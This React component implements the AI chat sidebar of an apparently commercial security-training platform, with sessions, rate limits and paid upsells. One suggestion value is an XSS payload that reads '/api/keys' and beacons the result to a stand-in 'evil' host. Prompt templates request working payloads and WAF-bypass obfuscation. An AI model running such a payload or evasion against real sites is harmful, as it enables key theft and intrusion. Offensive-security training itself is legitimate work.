import { useState, useEffect, useRef } from "react";
import { Link } from "react-router-dom";
import { api } from "../lib/api";
import { X, Copy, Check, Trash, Plus, ClockCounterClockwise, CaretLeft, ChatText, Crown, Lightning, Stop } from "@phosphor-icons/react";
import Markdown from "./Markdown";
import { toast } from "sonner";

const HISTORY_KEY = "hc_secops_history";
const SESSIONS_KEY = "hc_secops_sessions";
const MAX_HISTORY = 20;
const MAX_SESSIONS = 30;

const SUGGESTIONS = [
    { label: "explain CVE-2023-1234", value: "Explain CVE-2023-1234 and how it is exploited." },
    { label: "audit this xss payload", value: "<script>fetch('/api/keys').then(r=>r.text()).then(t=>navigator.sendBeacon('//evil',t))</script>" },
    { label: "how does HSTS work?", value: "How does HSTS work and what attacks does it prevent?" },
    { label: "debug my failing payload", value: "This payload isn't landing, help me debug it: " },
];

// Purpose-built one-tap actions — the copilot verbs a hacker actually wants,
// vs a blank chatbot box. Some become context-aware when a lab/CTF is open.
const QUICK_ACTIONS = [
    { key: "payload", label: "generate payload", prompt: "Generate a working payload for the following target/scenario (give the exact copy-pasteable payload + how to fire it): " },
    { key: "poc", label: "explain CVE + PoC", prompt: "Explain this CVE and give a concrete working proof-of-concept: " },
    { key: "nextstep", label: "what's my next step", prompt: "I'm stuck. Based on what I've found so far, what's the single most likely next step to progress? Here's where I am: " },
    { key: "report", label: "build bug-bounty report", prompt: "Turn my findings into a professional bug-bounty report (title, severity/CVSS, steps to reproduce, impact, remediation). Findings: " },
    { key: "encode", label: "encode / obfuscate", prompt: "Encode or obfuscate the following to bypass a filter/WAF, and show a few variants: " },
    { key: "exploit", label: "explain this exploit", prompt: "Explain how this exploit/snippet works, line by line: " },
];

// Map the current route to a SEC-OPS context string so the copilot already
// knows what the hacker is looking at (zero copy-paste). Best-effort only.
function contextFromPath() {
    try {
        const p = window.location.pathname;
        let m;
        if ((m = p.match(/^\/labs\/([^/]+)/))) return `lab: ${m[1].replace(/-/g, " ")}`;
        if ((m = p.match(/^\/ctf\/([^/]+)/))) return `ctf challenge: ${m[1].replace(/-/g, " ")}`;
        if ((m = p.match(/^\/network-labs\/([^/]+)/))) return `network lab: ${m[1].replace(/-/g, " ")}`;
        if ((m = p.match(/^\/investigations\/([^/]+)/))) return `investigation: ${m[1].replace(/-/g, " ")}`;
        if ((m = p.match(/^\/tracks\/([^/]+)\/capstone/))) return `capstone: ${m[1].replace(/-/g, " ")}`;
    } catch { /* ssr / private */ }
    return "";
}

const truncate = (s, n = 90) => {
    const t = (s || "").trim();
    return t.length > n ? t.slice(0, n).replace(/\s+/g, " ") + "…" : t.replace(/\s+/g, " ");
};

const timeAgo = (ts) => {
    const s = Math.floor((Date.now() - ts) / 1000);
    if (s < 60) return "just now";
    if (s < 3600) return `${Math.floor(s / 60)}m ago`;
    if (s < 86400) return `${Math.floor(s / 3600)}h ago`;
    return `${Math.floor(s / 86400)}d ago`;
};

export default function AIHelperPanel({ open, onClose, prefill = "" }) {
    const [content, setContent] = useState(prefill);
    const [context, setContext] = useState("");
    const [loading, setLoading] = useState(false);
    const [turns, setTurns] = useState([]);        // [{ q, ctx, answer }]
    const [streamed, setStreamed] = useState("");
    const [streaming, setStreaming] = useState(false);
    const [copiedIdx, setCopiedIdx] = useState(-1);
    const [usage, setUsage] = useState(null);
    const [upsell, setUpsell] = useState(null);   // { message, retryMin } when rate-limited

    const [history, setHistory] = useState([]);
    const [histIdx, setHistIdx] = useState(-1);
    const draftRef = useRef("");

    const [sessions, setSessions] = useState([]);
    const [sessionId, setSessionId] = useState(null);
    const [showSessions, setShowSessions] = useState(false);

    const consoleRef = useRef(null);
    const inputRef = useRef(null);
    const streamTimer = useRef(null);
    const streamFullRef = useRef("");

    const loadUsage = async () => {
        try {
            const { data } = await api.get("/ai/usage");
            setUsage(data);
        } catch { /* not signed in */ }
    };

    useEffect(() => {
        if (!open) return;
        loadUsage();
        // Auto-inject page context (lab/ctf/etc.) so the copilot starts informed.
        if (!context) {
            const ctx = contextFromPath();
            if (ctx) setContext(ctx);
        }
        try {
            const h = JSON.parse(localStorage.getItem(HISTORY_KEY) || "[]");
            if (Array.isArray(h)) setHistory(h.slice(0, MAX_HISTORY));
            const s = JSON.parse(localStorage.getItem(SESSIONS_KEY) || "[]");
            if (Array.isArray(s)) setSessions(s.slice(0, MAX_SESSIONS));
        } catch { /* private mode */ }
        setTimeout(() => inputRef.current?.focus(), 120);
        const onKey = (e) => { if (e.key === "Escape") { if (showSessions) setShowSessions(false); else onClose(); } };
        window.addEventListener("keydown", onKey);
        return () => window.removeEventListener("keydown", onKey);
    // eslint-disable-next-line react-hooks/exhaustive-deps
    }, [open, onClose, showSessions]);

    // One-tap action → prefills the prompt and focuses the input for the hacker
    // to append their target/snippet, then send.
    const runAction = (action) => {
        setContent(action.prompt);
        setHistIdx(-1);
        setTimeout(() => {
            const el = inputRef.current;
            if (el) { el.focus(); autoGrow(el); el.selectionStart = el.selectionEnd = el.value.length; }
        }, 40);
    };

    useEffect(() => {
        if (consoleRef.current) consoleRef.current.scrollTop = consoleRef.current.scrollHeight;
    }, [streamed, loading, turns]);

    useEffect(() => () => clearInterval(streamTimer.current), []);

    const startStream = (full) => {
        clearInterval(streamTimer.current);
        streamFullRef.current = full;
        setStreamed("");
        setStreaming(true);
        let i = 0;
        const step = Math.max(2, Math.ceil(full.length / 250));
        streamTimer.current = setInterval(() => {
            i += step;
            if (i >= full.length) {
                setStreamed(full);
                setStreaming(false);
                clearInterval(streamTimer.current);
            } else {
                setStreamed(full.slice(0, i));
            }
        }, 16);
    };

    const finishStream = () => {
        clearInterval(streamTimer.current);
        setStreamed(streamFullRef.current);
        setStreaming(false);
    };

    const pushHistory = (cmd) => {
        setHistory((prev) => {
            const next = [cmd, ...prev.filter((x) => x !== cmd)].slice(0, MAX_HISTORY);
            try { localStorage.setItem(HISTORY_KEY, JSON.stringify(next)); } catch { /* noop */ }
            return next;
        });
        setHistIdx(-1);
    };

    // Auto-save the growing thread as a session (localStorage).
    const persistSession = (nextTurns) => {
        const id = sessionId || `s_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 6)}`;
        if (!sessionId) setSessionId(id);
        setSessions((prev) => {
            const existing = prev.find((s) => s.id === id);
            const rec = {
                id,
                title: truncate(nextTurns[0]?.q, 60) || "Untitled",
                turns: nextTurns,
                createdAt: existing?.createdAt || Date.now(),
                updatedAt: Date.now(),
            };
            const next = [rec, ...prev.filter((s) => s.id !== id)].slice(0, MAX_SESSIONS);
            try { localStorage.setItem(SESSIONS_KEY, JSON.stringify(next)); } catch { /* noop */ }
            return next;
        });
    };

    const newSession = () => {
        clearInterval(streamTimer.current);
        setTurns([]);
        setStreamed("");
        setStreaming(false);
        setLoading(false);
        setSessionId(null);
        setContent("");
        setShowSessions(false);
        setTimeout(() => inputRef.current?.focus(), 60);
    };

    const openSession = (s) => {
        clearInterval(streamTimer.current);
        setStreaming(false);
        setStreamed("");
        setLoading(false);
        setTurns(s.turns || []);
        setSessionId(s.id);
        setContent("");
        setShowSessions(false);
        setTimeout(() => inputRef.current?.focus(), 60);
    };

    const deleteSession = (id) => {
        setSessions((prev) => {
            const next = prev.filter((s) => s.id !== id);
            try { localStorage.setItem(SESSIONS_KEY, JSON.stringify(next)); } catch { /* noop */ }
            return next;
        });
        if (id === sessionId) { setTurns([]); setSessionId(null); }
    };

    const clearAllSessions = () => {
        setSessions([]);
        setTurns([]);
        setSessionId(null);
        try { localStorage.removeItem(SESSIONS_KEY); } catch { /* noop */ }
        toast.success("All sessions cleared");
    };

    const clearCommandHistory = () => {
        setHistory([]);
        setHistIdx(-1);
        try { localStorage.removeItem(HISTORY_KEY); } catch { /* noop */ }
        toast.success("Command history cleared");
    };

    const explain = async () => {
        const trimmed = content.trim();
        if (!trimmed) return toast.error("Type a CVE, snippet or payload to analyze");
        const priorHistory = turns.flatMap((t) => ([
            { role: "user", text: t.q },
            { role: "assistant", text: t.answer },
        ])).filter((m) => m.text);
        const ctx = context.trim();
        setLoading(true);
        setUpsell(null);
        setStreamed("");
        setStreaming(false);
        const pending = [...turns, { q: trimmed, ctx, answer: "" }];
        setTurns(pending);
        pushHistory(trimmed);
        setContent("");
        try {
            const { data } = await api.post("/ai/explain", { content: trimmed, context: ctx, history: priorHistory });
            const answered = pending.map((t, i) => (i === pending.length - 1 ? { ...t, answer: data.explanation } : t));
            setTurns(answered);
            persistSession(answered);
            startStream(data.explanation);
            if (data.secops_credit_used) {
                setUsage((u) => ({ ...(u || {}), remaining: 0, secops_credits: data.secops_credits }));
                toast(`Used 1 SEC-OPS credit · ${data.secops_credits} left`, { icon: "⚡" });
            } else if (data.rate_remaining !== undefined) {
                setUsage((u) => ({ ...(u || {}), limit: data.rate_limit, remaining: data.rate_remaining, used: data.rate_limit - data.rate_remaining }));
            } else { loadUsage(); }
        } catch (e) {
            setTurns((prev) => prev.slice(0, -1));
            setContent(trimmed);
            if (e?.response?.status === 429) {
                const d = e?.response?.data?.detail || {};
                // Free/Pro users who can still upgrade get the in-panel upsell card.
                if (d.pro_eligible) {
                    setUpsell({
                        message: d.message || "You've hit the free SEC-OPS limit for this hour.",
                        retryMin: Math.ceil((d.retry_in_secs || 3600) / 60),
                        limit: d.limit || 15,
                    });
                } else {
                    toast.error(d.message || d || "Rate limit reached");
                }
                loadUsage();
            } else {
                const msg = e?.response?.status === 401 ? "Sign in to use SEC-OPS" : (e?.response?.data?.detail || "AI service error");
                toast.error(typeof msg === "string" ? msg : "AI service error");
            }
        }
        setLoading(false);
    };

    // Grow the prompt textarea with its content, ChatGPT-style, up to a cap.
    const autoGrow = (el) => {
        if (!el) return;
        el.style.height = "auto";
        el.style.height = `${Math.min(el.scrollHeight, 160)}px`;
    };

    const onKeyDown = (e) => {
        // ChatGPT-standard: Enter sends, Shift+Enter (or Cmd/Ctrl+Enter) makes a newline.
        if (e.key === "Enter" && !e.shiftKey && !e.metaKey && !e.ctrlKey) {
            e.preventDefault();
            if (!loading) explain();
            return;
        }
        const el = e.target;
        if (e.key === "ArrowUp") {
            const beforeCaret = el.value.slice(0, el.selectionStart);
            if (!beforeCaret.includes("\n") && history.length) {
                e.preventDefault();
                if (histIdx < 0) draftRef.current = content;
                const ni = histIdx < 0 ? 0 : Math.min(histIdx + 1, history.length - 1);
                setHistIdx(ni);
                setContent(history[ni]);
                setTimeout(() => autoGrow(inputRef.current), 0);
            }
        } else if (e.key === "ArrowDown") {
            const afterCaret = el.value.slice(el.selectionStart);
            if (!afterCaret.includes("\n") && histIdx >= 0) {
                e.preventDefault();
                const ni = histIdx - 1;
                if (ni < 0) { setHistIdx(-1); setContent(draftRef.current); }
                else { setHistIdx(ni); setContent(history[ni]); }
                setTimeout(() => autoGrow(inputRef.current), 0);
            }
        }
    };

    const copy = (text, idx) => {
        navigator.clipboard.writeText(text);
        setCopiedIdx(idx);
        setTimeout(() => setCopiedIdx(-1), 2000);
    };

    if (!open) return null;

    const hasThread = turns.length > 0;
    const badgeTone = !usage ? "" :
        usage.remaining === 0 ? "text-rose-400" :
        usage.remaining <= 3 ? "text-amber-400" :
        "text-emerald-400";

    return (
        <div
            className="fixed right-0 top-0 bottom-0 w-full sm:w-[480px] z-50 animate-slidein bg-[#05070c] border-l border-white/10 shadow-2xl shadow-black/70 flex flex-col font-mono"
            data-testid="ai-helper-panel"
            data-notranslate
        >
            {/* Terminal title bar */}
            <div className="flex items-center gap-2.5 px-4 py-2.5 bg-[#0b0f19] shrink-0">
                <div className="flex-1 text-[11px] tracking-wide text-slate-400 truncate select-none">
                    sec-ops@claude — <span className="text-violet-400">~/analyze</span>
                </div>
                {usage && !showSessions && (
                    <span
                        className={`text-[10px] tracking-widest ${badgeTone}`}
                        title={`${usage.used}/${usage.limit} used this hour`}
                        data-testid="ai-rate-badge"
                    >
                        [{usage.remaining}/{usage.limit}]
                    </span>
                )}
                {usage && !showSessions && usage.secops_credits > 0 && (
                    <span
                        className="text-[10px] tracking-widest text-violet-300 flex items-center gap-0.5"
                        title={`${usage.secops_credits} SEC-OPS credits — spent automatically when your hourly runs run out`}
                        data-testid="ai-credits-badge"
                    >
                        <Lightning size={10} weight="fill" />{usage.secops_credits}
                    </span>
                )}
                <button
                    onClick={() => setShowSessions((v) => !v)}
                    className={`relative w-6 h-6 flex items-center justify-center transition-colors ${showSessions ? "text-violet-400" : "text-slate-500 hover:text-slate-200"}`}
                    data-testid="ai-sessions-btn"
                    title="Saved sessions"
                >
                    <ClockCounterClockwise size={15} weight="bold" />
                    {sessions.length > 0 && !showSessions && (
                        <span className="absolute -top-1 -right-1 min-w-[13px] h-[13px] px-0.5 rounded-full bg-violet-500 text-white text-[8px] leading-[13px] text-center font-bold">{sessions.length}</span>
                    )}
                </button>
                {hasThread && !showSessions && (
                    <button
                        onClick={newSession}
                        className="w-6 h-6 flex items-center justify-center text-slate-500 hover:text-emerald-400 transition-colors"
                        data-testid="ai-new-session-btn"
                        title="New session"
                    >
                        <Plus size={15} weight="bold" />
                    </button>
                )}
                <button
                    onClick={onClose}
                    className="w-6 h-6 flex items-center justify-center text-slate-500 hover:text-slate-200 transition-colors"
                    data-testid="close-ai-panel"
                    title="Close (Esc)"
                >
                    <X size={15} weight="bold" />
                </button>
            </div>
            <div className="h-px shrink-0 bg-gradient-to-r from-transparent via-violet-500/25 to-transparent" />

            {/* Sessions drawer */}
            {showSessions ? (
                <div className="flex-1 flex flex-col overflow-hidden" data-testid="ai-sessions-panel">
                    <div className="flex items-center gap-2 px-4 py-3">
                        <button
                            onClick={() => setShowSessions(false)}
                            className="flex items-center gap-1.5 text-slate-400 hover:text-slate-100 text-[11px] uppercase tracking-widest transition-colors"
                            data-testid="ai-sessions-close"
                        >
                            <CaretLeft size={13} weight="bold" /> back
                        </button>
                        <div className="flex-1 text-center text-[11px] uppercase tracking-widest text-slate-500">
                            saved sessions ({sessions.length})
                        </div>
                        <button
                            onClick={newSession}
                            className="flex items-center gap-1 text-emerald-400 hover:text-emerald-300 text-[11px] uppercase tracking-widest transition-colors"
                            data-testid="ai-sessions-new"
                        >
                            <Plus size={13} weight="bold" /> new
                        </button>
                    </div>
                    <div className="h-px shrink-0 bg-gradient-to-r from-transparent via-violet-500/25 to-transparent" />

                    <div className="flex-1 overflow-y-auto px-3 py-3">
                        {sessions.length === 0 ? (
                            <div className="text-slate-600 text-[12px] text-center px-6 py-10 leading-relaxed">
                                No saved sessions yet.<br />Your Sec-Ops threads save automatically as you run them.
                            </div>
                        ) : (
                            <div className="space-y-1.5">
                                {sessions.map((s) => (
                                    <div
                                        key={s.id}
                                        className={`group flex items-center gap-2.5 rounded-lg px-3 py-2.5 cursor-pointer transition-colors ${s.id === sessionId ? "bg-violet-500/10 ring-1 ring-violet-500/30" : "hover:bg-white/[0.04]"}`}
                                        onClick={() => openSession(s)}
                                        data-testid="ai-session-item"
                                    >
                                        <ChatText size={15} className="text-slate-500 shrink-0" />
                                        <div className="flex-1 min-w-0">
                                            <div className="text-[13px] text-slate-200 truncate font-sans">{s.title}</div>
                                            <div className="text-[10px] text-slate-600 tracking-wide mt-0.5">
                                                {s.turns.length} {s.turns.length === 1 ? "turn" : "turns"} · {timeAgo(s.updatedAt)}
                                            </div>
                                        </div>
                                        <button
                                            onClick={(e) => { e.stopPropagation(); deleteSession(s.id); }}
                                            className="w-6 h-6 flex items-center justify-center text-slate-600 hover:text-rose-400 opacity-0 group-hover:opacity-100 transition-all shrink-0"
                                            data-testid="ai-session-delete"
                                            title="Delete session"
                                        >
                                            <Trash size={13} />
                                        </button>
                                    </div>
                                ))}
                            </div>
                        )}
                    </div>

                    <div className="h-px shrink-0 bg-gradient-to-r from-transparent via-violet-500/25 to-transparent" />
                    <div className="flex items-center justify-between px-4 py-2.5 text-[10px] uppercase tracking-widest">
                        <button
                            onClick={clearCommandHistory}
                            disabled={history.length === 0}
                            className="text-slate-600 hover:text-slate-300 transition-colors disabled:opacity-40 disabled:hover:text-slate-600"
                            data-testid="ai-clear-history-btn"
                        >
                            clear ↑ history
                        </button>
                        <button
                            onClick={clearAllSessions}
                            disabled={sessions.length === 0}
                            className="text-slate-600 hover:text-rose-400 transition-colors disabled:opacity-40 disabled:hover:text-slate-600 flex items-center gap-1.5"
                            data-testid="ai-sessions-clear-all"
                        >
                            <Trash size={12} /> clear all
                        </button>
                    </div>
                </div>
            ) : (
                <>
                    {/* Console output */}
                    <div
                        ref={consoleRef}
                        onClick={() => { if (streaming) finishStream(); }}
                        className="flex-1 overflow-y-auto px-4 py-3.5 text-[13px] leading-relaxed text-slate-300 bg-[#05070c]"
                    >
                        <div className="text-slate-500 space-y-0.5 select-none">
                            <div><span className="text-violet-400">sec-ops</span> shell <span className="text-slate-600">v1.0</span> · claude sonnet 4.5</div>
                            <div className="text-slate-600">paste a CVE, code snippet or payload — or just ask. hit <span className="text-slate-400">Enter</span> to run.</div>
                        </div>

                        {!loading && !hasThread && (
                            <div className="mt-4 space-y-3" data-testid="ai-suggestions">
                                <div>
                                    <div className="text-slate-600 text-[11px] uppercase tracking-widest mb-1.5">copilot actions</div>
                                    <div className="flex flex-wrap gap-1.5">
                                        {QUICK_ACTIONS.map((a) => (
                                            <button
                                                key={a.key}
                                                onClick={() => runAction(a)}
                                                className="text-[11px] text-violet-200 bg-violet-500/10 hover:bg-violet-500/20 border border-violet-500/30 rounded-sm px-2.5 py-1 transition-colors font-sans"
                                                data-testid={`ai-action-${a.key}`}
                                            >
                                                {a.label}
                                            </button>
                                        ))}
                                    </div>
                                </div>
                                <div>
                                    <div className="text-slate-600 text-[11px] uppercase tracking-widest mb-1">quickstart</div>
                                    {SUGGESTIONS.map((s) => (
                                        <button
                                            key={s.label}
                                            onClick={() => { setContent(s.value); setTimeout(() => { autoGrow(inputRef.current); inputRef.current?.focus(); }, 20); }}
                                            className="group block w-full text-left text-slate-400 hover:text-emerald-300 transition-colors"
                                            data-testid="ai-suggestion"
                                        >
                                            <span className="text-emerald-500/70 group-hover:text-emerald-400 mr-2">$</span>{s.label}
                                        </button>
                                    ))}
                                </div>
                            </div>
                        )}

                        {turns.map((t, i) => {
                            const isLast = i === turns.length - 1;
                            const body = isLast && streaming ? streamed : t.answer;
                            const showCaret = isLast && streaming;
                            return (
                                <div key={i} className="mt-4" data-testid="ai-turn">
                                    <div className="flex items-start gap-2 text-slate-200">
                                        <span className="text-emerald-400 shrink-0">$</span>
                                        <span className="break-words">
                                            <span className="text-violet-300">analyze</span> {t.ctx && <span className="text-slate-500">--context={t.ctx} </span>}"{truncate(t.q)}"
                                        </span>
                                    </div>

                                    {isLast && loading && !t.answer && (
                                        <div className="mt-2 text-slate-400 flex items-center gap-2">
                                            <span className="text-violet-400">▸</span> analyzing --depth=technical
                                            <span className="inline-block w-2 h-4 bg-violet-400 animate-pulse" />
                                        </div>
                                    )}

                                    {t.answer && (
                                        <div className="mt-2.5 space-y-2">
                                            <div className="flex items-center justify-between text-slate-600 text-[11px] uppercase tracking-widest">
                                                <span>// output{showCaret && <span className="text-slate-500 normal-case tracking-normal ml-1.5">(click to skip)</span>}</span>
                                                <button
                                                    onClick={() => copy(t.answer, i)}
                                                    className="flex items-center gap-1.5 text-slate-500 hover:text-emerald-300 transition-colors normal-case tracking-normal"
                                                    data-testid="copy-explanation"
                                                >
                                                    {copiedIdx === i ? <><Check size={12} weight="bold" /> copied</> : <><Copy size={12} /> copy</>}
                                                </button>
                                            </div>
                                            <div className="border-l-2 border-violet-500/40 pl-3.5 py-0.5 font-sans" data-testid="ai-result">
                                                <Markdown>{body}</Markdown>
                                                {showCaret && <span className="inline-block w-2 h-4 align-middle bg-violet-400 animate-pulse" />}
                                            </div>
                                            {isLast && !streaming && (
                                                <div className="text-emerald-500/60 select-none pt-1">$ <span className="inline-block w-2 h-4 align-middle bg-emerald-500/60 animate-pulse" /></div>
                                            )}
                                        </div>
                                    )}
                                </div>
                            );
                        })}

                        {/* Rate-limit upsell — free hackers who hit 15/hr */}
                        {upsell && (
                            <div className="mt-5 border border-cyan-500/40 bg-cyan-500/[0.06] rounded-md p-4 font-sans" data-testid="ai-rate-upsell">
                                <div className="flex items-center gap-2 text-cyan-300">
                                    <Lightning size={16} weight="fill" />
                                    <span className="text-sm font-bold" style={{ fontFamily: "'Space Grotesk', 'Chivo', sans-serif" }}>You&apos;ve hit the free limit</span>
                                </div>
                                <p className="text-[13px] text-slate-300 mt-1.5 leading-relaxed">
                                    Free SEC-OPS is capped at <span className="text-slate-100 font-semibold">{upsell.limit} runs/hour</span>. Resets in about {upsell.retryMin} min —
                                    or keep going right now:
                                </p>
                                <ul className="mt-2.5 space-y-1 text-[12.5px] text-slate-300">
                                    <li className="flex items-start gap-2"><Crown size={13} weight="fill" className="text-cyan-300 mt-0.5 shrink-0" /><span><span className="text-slate-100 font-semibold">Go Pro</span> — 100 runs/hour (6×), 50 AI hints/month, 2× XP &amp; all Hard labs, from $8.25/mo.</span></li>
                                    <li className="flex items-start gap-2"><Lightning size={13} weight="fill" className="text-violet-300 mt-0.5 shrink-0" /><span><span className="text-slate-100 font-semibold">SEC-OPS credit packs</span> — pay-as-you-go top-ups, no subscription. From $4.99.</span></li>
                                </ul>
                                <div className="flex flex-wrap gap-2 mt-3.5">
                                    <Link to="/billing" onClick={onClose} data-testid="ai-upsell-go-pro"
                                        className="inline-flex items-center gap-1.5 bg-cyan-400 hover:bg-cyan-300 text-slate-950 text-[11px] font-bold uppercase tracking-widest px-4 py-2 rounded-sm transition-colors">
                                        <Crown size={12} weight="fill" /> go pro
                                    </Link>
                                    <Link to="/billing?tab=lab" onClick={onClose} data-testid="ai-upsell-credits"
                                        className="inline-flex items-center gap-1.5 border border-violet-500/50 text-violet-200 hover:bg-violet-500/10 text-[11px] font-bold uppercase tracking-widest px-4 py-2 rounded-sm transition-colors">
                                        <Lightning size={12} weight="fill" /> get credits
                                    </Link>
                                </div>
                            </div>
                        )}
                    </div>

                    {/* Prompt input */}
                    <div className="h-px shrink-0 bg-gradient-to-r from-transparent via-violet-500/25 to-transparent" />
                    <div className="shrink-0 bg-[#0b0f19] px-4 py-3 space-y-2">
                        <div className="flex items-center gap-2 text-[12px]">
                            <span className="text-slate-600 shrink-0 w-3 text-center select-none">#</span>
                            <input
                                value={context}
                                onChange={(e) => setContext(e.target.value)}
                                placeholder="context — linux kernel 5.x, web app, java… (optional)"
                                className="flex-1 bg-transparent outline-none text-slate-300 placeholder:text-slate-700 caret-emerald-400"
                                data-testid="ai-context-input"
                            />
                            {context && contextFromPath() === context && (
                                <span className="shrink-0 text-[9px] uppercase tracking-widest text-cyan-400/80 border border-cyan-500/30 rounded-sm px-1.5 py-0.5" data-testid="ai-context-auto" title="Auto-detected from the page you're on">
                                    auto
                                </span>
                            )}
                        </div>
                        <div className="flex items-end gap-2">
                            <span className="text-emerald-400 pb-2 shrink-0 w-3 text-center select-none">$</span>
                            <textarea
                                ref={inputRef}
                                value={content}
                                onChange={(e) => { setContent(e.target.value); setHistIdx(-1); autoGrow(e.target); }}
                                onKeyDown={onKeyDown}
                                placeholder={hasThread ? "ask a follow-up…" : "paste a CVE, snippet or payload — or just ask a question…"}
                                rows={1}
                                className="flex-1 bg-transparent outline-none resize-none text-slate-100 placeholder:text-slate-700 text-[13px] leading-relaxed caret-emerald-400 py-1.5 max-h-40 overflow-y-auto"
                                data-testid="ai-content-input"
                            />
                            {loading ? (
                                <button
                                    onClick={finishStream}
                                    className="shrink-0 self-end w-9 h-9 flex items-center justify-center rounded-md bg-slate-700 hover:bg-slate-600 text-slate-200 transition-colors"
                                    data-testid="ai-stop-btn"
                                    title="Stop"
                                >
                                    <Stop size={14} weight="fill" />
                                </button>
                            ) : (
                                <button
                                    onClick={explain}
                                    disabled={!content.trim()}
                                    className="shrink-0 self-end w-9 h-9 flex items-center justify-center rounded-md bg-violet-500 hover:bg-violet-400 text-white transition-colors disabled:opacity-40 disabled:cursor-not-allowed"
                                    data-testid="ai-explain-btn"
                                    title="Send (Enter)"
                                >
                                    <Lightning size={15} weight="fill" />
                                </button>
                            )}
                        </div>
                        <div className="text-[10px] text-slate-600 tracking-wide pl-5 select-none">
                            <span className="text-slate-500">Enter</span> to send · <span className="text-slate-500">Shift+Enter</span> for a new line · <span className="text-slate-500">↑</span> recalls history
                        </div>
                    </div>
                </>
            )}
        </div>
    );
}
